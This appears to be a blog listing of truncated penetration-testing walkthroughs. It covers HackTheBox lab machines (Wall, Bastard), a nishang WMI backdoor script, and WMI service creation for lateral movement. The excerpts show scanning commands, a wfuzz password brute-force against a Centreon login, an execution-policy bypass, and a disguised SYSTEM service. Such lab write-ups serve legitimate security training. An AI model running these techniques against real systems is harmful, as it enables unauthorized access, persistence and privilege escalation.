HACKTHEBOX

WALL – (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.157 Now try to access http://10.10.10.157 root@kali:~/Downloads# gobuster dir -u http://10.10.10.157 -w /usr/share/wordlists/dirb/common.txt Now on browser http://10.10.10.157/monitoring Now on terminal root@kali:~/Downloads# curl -X POST http://10.10.10.157/monitoring/ Now on browser try to access http://10.10.10.157/centreon/ root@kali:~/Downloads# wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://10.10.10.157/centreon/api/index.php?action=authenticate Back to portal Username : admin Password : password1 And […]

WMI

Security Descriptor

This allows a particular user or group on a WMI namespace the same privileges as administrator: PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Backdoors\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName victim6 -Verbose PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName administrator -ComputerName 192.168.222.144 -Credential SECURITY\administrator -Verbose PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> powershell -ep bypass PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> . .\Set-RemoteWMI.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> help Set-RemoteWMI -Examples PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Set-RemoteWMI -UserName […]

HACKTHEBOX

Bastard (HACKTHEBOX)

1) root@kali:~/Downloads# nmap -sC -sV -A 10.10.10.9 Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-09 22:52 EDT Nmap scan report for 10.10.10.9 Host is up (0.16s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | […]

Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -ClassName win32_service).CimClassMethods Create a service: PS C:\Users\victim6\Downloads> $servicetype = [byte] 16 PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1 PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -Name create -ArgumentList $false, "Windows performance", $ErrorControl, $null, $null, "WinPerf", "C:\Windows\System32\calc.exe", $null, $servicetype, "Manual", "NT Authority\system", " " PS C:\Users\victim6\Downloads> Get-WmiObject -Class win32_service -Filter 'name = "WinPerf"' Start the service: PS C:\Users\victim6\Downloads> Get-WmiObject […]